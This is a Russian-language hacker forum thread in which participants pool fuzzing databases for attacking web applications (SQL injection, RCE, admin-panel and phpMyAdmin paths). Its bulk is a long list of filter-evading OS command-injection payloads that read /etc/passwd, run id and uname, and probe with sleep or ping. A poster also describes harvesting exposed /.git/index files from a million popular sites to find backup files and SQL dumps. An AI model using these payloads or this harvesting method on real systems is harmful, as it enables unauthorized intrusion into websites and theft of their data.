![]() |
А давайте соберем свою базу по фазингу. На данный момент интересует SQL INJ:
имеем https://www.owasp.org/index.php/Cate..._Code_Database Так же принимаем списки по другим типам уязвимостей, особый интерес к SQL, RCE, EVAL PHP, admin panel Обратите внимание на extension'ы в некоторых списках. Вместо указания .php/.html/.php3 etc. указано .EXT для подстановки на лету нужного расширения под тип веб-приложения. phpmyadmin: https://gist.github.com/b3dEvilooper...d931a16bd98e05 Код:
Code:https://gist.github.com/b3dEvilooper...10f33c12f02b70 Код:
Code:Код:
Code: |
|
Поддерживаю. Скидывайте базы(паттерны) по RCE в первую очередь.
Так-же, не лишним будет сюда добавить и базы(паттерны) под всевозможные формы, AJAX запросы, и так далее. Предложил - начну: Код:
Code: |
|
обработаю ваши ссылки и составлю базу для брута путей админок и pma-аналогов
|
немного добавил в первый пост
|
|
Phpinfo files
----------------- .SpoilerTarget" type="button">Spoiler: Spoiler Код:
Code:----------------- .SpoilerTarget" type="button">Spoiler: Spoiler Код:
Code:----------------- .SpoilerTarget" type="button">Spoiler: Spoiler Код:
Code:----------------- .SpoilerTarget" type="button">Spoiler: Spoiler [CODE] Code: /usr/bin/id /bin/uname uname sleep 100 ping your_ip /bin/sleep 100 /bin/ping your_ip /???/???/?d /???/u???e /???/s???p 100 /???/p??g your_ip /???/s???p$IFS\100 /???/p??g$IFS\your_ip /???/s???p${IFS}100 /???/p??g${IFS}your_ip /b*/sl*p 100 /b*/p*g your_ip /u*/b*/id /b*/u*e /b*/sl*p$IFS\100 /b*/sl*p${IFS}100 /b*/p*g$IFS\your_ip /b*/p*g${IFS}your_ip /u"s"r/b"i"n/"i"d /"b"i"n"/"u"n"a"m"e" u"n"a"m"e s"l"e"e"p 100 p"i"n"g" your_ip /"b"i"n"/"s"l"e"e"p" 100 /"b"i"n"/"p"i"n"g your_ip /u's'r/b'i'n/'i'd /'b'i'n'/'u'n'a'm'e' u'n'a'm'e s'l'e'e'p 100 p'i'n'g' your_ip /'b'i'n'/'s'l'e'e'p' 100 /'b'i'n'/'p'i'n'g your_ip /usr$d/bin$d/id$d /bin$d/uname$d uname$d sleep$d 100 ping$d your_ip /bin$d/sleep$d 100 /bin$d/ping$d your_ip /\u\s\r/\b\i\n/\i\d /\b\i\n/\u\n\a\m\e \u\n\a\m\e \s\l\e\e\p 100 \p\i\n\g your_ip /\b\i\n/\s\l\e\e\p 100 /\b\i\n/\p\i\n\g your_ip /\\u\\s\\r/\\b\\i\\n/\\i\\d /\\b\\i\\n/\\u\\n\\a\\m\\e \\u\\n\\a\\m\\e \\s\\l\\e\\e\\p 100 \\p\\i\\n\\g your_ip /\\b\\i\\n/\\s\\l\\e\\e\\p 100 /\\b\\i\\n/\\p\\i\\n\\g your_ip /\u$d\s$d\r$d/\b$d\i$d\n$d/\i$d\d$d /\b$d\i$d\n$d/\u$d\n$d\a$d\m$d\e$d \u$d\n$d\a$d\m$d\e$d \s$d\l$d\e$d\e$d\p$d 100 \p$d\i$d\n$d\g$d your_ip /\b$d\i$d\n$d/\s$d\l$d\e$d\e$d\p$d 100 /\b$d\i$d\n$d/\p$d\i$d\n$d\g$d your_ip /\\u$d\\s$d\\r$d/\\b$d\\i$d\\n$d/\\i$d\\d$d /\\b$d\\i$d\\n$d/\\u$d\\n$d\\a$d\\m$d\\e$d \\u$d\\n$d\\a$d\\m$d\\e$d \\s$d\\l$d\\e$d\\e$d\\p$d 100 \\p$d\\i$d\\n$d\\g$d your_ip /\\b$d\\i$d\\n$d/\\s$d\\l$d\\e$d\\e$d\\p$d 100 /\\b$d\\i$d\\n$d/\\p$d\\i$d\\n$d\\g$d your_ip /u$d"s"$d"r"$d/b$d"i"$d"n"$d/id$d /b$d"i"$d"n"$d/u$d"n"$d"a"$d"m"$d"e"$d u$d"n"$d"a"$d"m"$d"e"$d s$d"l"$d"e"$d"e"$d"p"$d 100 p$d"i"$d"n"$d"g"$d your_ip /b$d"i"$d"n"$d/s$d"l"$d"e"$d"e"$d"p"$d 100 /b$d"i"$d"n"$d/p$d"i"$d"n"$d"g"$d your_ip /u$d's'$d'r'$d/b$d'i'$d'n'$d/id$d /b$d'i'$d'n'$d/u$d'n'$d'a'$d'm'$d'e'$d u$d'n'$d'a'$d'm'$d'e'$d s$d'l'$d'e'$d'e'$d'p'$d 100 p$d'i'$d'n'$d'g'$d your_ip /b$d'i'$d'n'$d/s$d'l'$d'e'$d'e'$d'p'$d 100 /b$d'i'$d'n'$d/p$d'i'$d'n'$d'g'$d your_ip cat<>/etc/passwd cat/etc/hosts cat/etc$d/passwd$d cat$d/\e$d\t\c/\p$d\a\s$d\s\w\d c$d'a'$d't'<>/e$d't'$d'c'/h$d'o'$d's'ts /b$d'i'n/c$d'a'$d't'<>/e$d't'$d'c'/h$d'o'$d's'ts /b$d"i"n/c$d"a"$d"t"<>/e$d"t"$d"c"/h$d"o"$d"s"ts c$d"a"$d"t"<>/e$d"t"$d"c"/h$d"o"$d"s"ts /bin/cat/etc/passwd c\\a$d\\t<>/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d cat$IFS/etc/passwd cat${IFS}/etc/passwd cat$d$IFS/etc$d/passwd$d cat$d${IFS}/etc$d/passwd$d /bin/cat$IFS/etc/passwd /bin/cat${IFS}/etc/passwd sleep${IFS}100 ping${IFS}your_ip /bin/sleep${IFS}100 /bin/ping${IFS}your_ip sleep$d${IFS}100$d c\a$d\t$IFS/\e$d\t\c/\p$d\a\s$d\s\w\d c\a$d\t${IFS}/\e$d\t\c/\p$d\a\s$d\s\w\d c\\a$d\\t$IFS/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d c\\a$d\\t${IFS}/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts c$d'a'$d't'${IFS}/e$d't'$d'c'/h$d'o'$d's'ts /b$d'i'n/c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts /b$d'i'n/c$d'a'$d't'${IFS}/e$d't'$d'c'/h$d'o'$d's'ts /b$d'i'n/c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts /b$d"i"n/c$d"a"$d"t"$IFS/e$d"t"$d"c"/h$d"o"$d"s"ts c$d"a"$d"t"$IFS/e$d"t"$d"c"/h$d"o"$d"s"ts sleep$IFS\100 ping$IFS\your_ip /bin/sleep$IFS\100 /bin/ping$IFS\your_ip sleep$d$IFS\100$d ping$d$IFS\your_ip$d /bin$d/sleep$d$IFS\100$d /bin$d/ping$d$IFS\your_ip$d sle$d'e'p$d$IFS\100$d pi$d'n'g$d$IFS\your_ip$d /b$d'i'n$d/sl$d'e'ep$d$IFS\100$d \s\l\e\e\p$d$IFS\100$d \p\i\n\g$d$IFS\your_ip$d /\b\i\n$d/\s\l\e\e\p$d$IFS\100$d /\b\i\n$d/\p\i\n\g$d$IFS\your_ip$d sle$d"e"p$d$IFS\100$d pi$d"n"g$d$IFS\your_ip$d /b$d"i"n$d/sl$d"e"ep$d$IFS\100$d \\s\\l\\e\\e\\p$d$IFS\\100$d \\p\\i\\n\\g$d$IFS\\your_ip$d /\\b\\i\\n$d/\\s\\l\\e\\e\\p$d$IFS\\100$d /\\b\\i\\n$d/\\p\\i\\n\\g$d$IFS\\your_ip$d \s\l\e$d\e\p$d$IFS\100$d \p\i$d\n\g$d$IFS\your_ip$d /\b$d\i\n$d/sl$d\e\\p$d$IFS\100$d \\s\\l\\e\\e\\p$d${IFS}\\100$d \\p\\i\\n\\g$d${IFS}\\your_ip$d /\\b\\i\\n$d/\\s\\l\\e\\e\\p$d${IFS}\\100$d /\\b\\i\\n$d/\\p\\i\\n\\g$d$IFS\\your_ip$d \\s\l\\e$d\\e\\p$d$IFS\\100$d \\p\\i$d\\n\\g$d$IFS\\your_ip$d /\\b$d\\i\\n$d/sl$d\\e\\p$d$IFS\\100$d \s\l\e\e\p${d}${IFS}\100${d} \p\i\n\g${d}${IFS}\your_ip${d} /\b\i\n${d}/\s\l\e\e\p${d}${IFS}\100${d} /\b\i\n$d/\p\i\n\g$d${IFS}\your_ip${d} \\s\l\\e${d}\\e\\p${d}${IFS}\\100${d} \\p\\i${d}\\n\\g${d}${IFS}\\your_ip${d} /\\b${d}\\i\\n${d}/sl${d}\\e\\p${d}${IFS}\\100${d} s"l"e"e"p${d}${IFS}100${d} p"i"n"g"${d}${IFS}your_ip${d} /"b"i"n"${d}/"s"l"e"e"p"${d}${IFS}100${d} /"b"i"n"$d/"p"i"n"g${d}${IFS}your_ip${d} \s\l\e${d}\e\p${d}${IFS}\100${d} \p\i${d}\n\\g${d}${IFS}\your_ip${d} /\b${d}\i\n${d}/sl${d}\e\p${d}${IFS}\100${d} s'l'e'e'p${d}${IFS}100${d} p'i'n'g'${d}${IFS}your_ip${d} /'b'i'n'${d}/'s'l'e'e'p'${d}${IFS}100${d} /'b'i'n'$d/'p'i'n'g${d}${IFS}your_ip${d} s"l"e${d}"e"p${d}${IFS}100${d} p"i"${d}"n"g${d}${IFS}your_ip${d} /"b"${d}i"n"${d}/s"l"${d}"e"p${d}${IFS}100${d} s'l'e${d}'e'p${d}${IFS}100${d} p'i'${d}'n'g${d}${IFS}your_ip${d} /'b'${d}i'n'${d}/s'l'${d}'e'p${d}${IFS}100${d} /\\b\\i\\n/\\c\\a$d\\t<>/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d /\b\i\n/\c\a$d\t<>/\e$d\t\c/\p$d\a\s$d\s\w\d s'l'e${d}'e'p${d}${IFS}100${d} cat${d}<>/etc${d}/passwd${d} /bin$d/cat$d<>/etc$d/passwd$d /bin${d}/cat${d}<>/etc${d}/passwd${d} /b${d}in/c${d}at<>/e${d}tc/pas${d}swd /bin$d/cat$d/et${d}c/pa${d}s${d}s${d}w${d}d /b${d}in/ca${d}t$<>/et${d}c/pa${d}s${d}s${d}w${d}d /b${d}in/ca${d}t$/et$2c/pa$2s$2s$2w$2d ca$2t$/et$2c/pa$2s$2s$2w$2d /b$2in/ca$2t$/et$*c/pa$*s$*s$*w$*d ca$*t/et$*c/pa$*s$*s$*w$*d /b$*in/ca$*t/et$@c/pa$@s$@s$@w$@d ca$@t/et$@c/pa$@s$@s$@w$@d /b$@in/ca$@t/et$!c/pa$@s$@s$@w$@d ca$!t/et$!c/pa$!s$!s$!w$!d /b$!in/ca$!t/e`ddd`tc/pa`ddd`ss`ddd`wd c`ddd`at/e$(ddd)tc/pa$(ddd)ss$(ddd)wd c$(ddd)at |
Предлогаю расширить базу через сбор данных из /git/.index топ миллиона сайтов с alexa. Слил все в локальную базу, пример для Backup files exstensions по запросам:
PHP.* Код:
Code:Код:
Code:Код:
Code:Принимаю идеи для поиска. |
Хотите знать пути до дампов и собрать маски для поиска sql фаилов?
SQL |
| Время: 05:58 |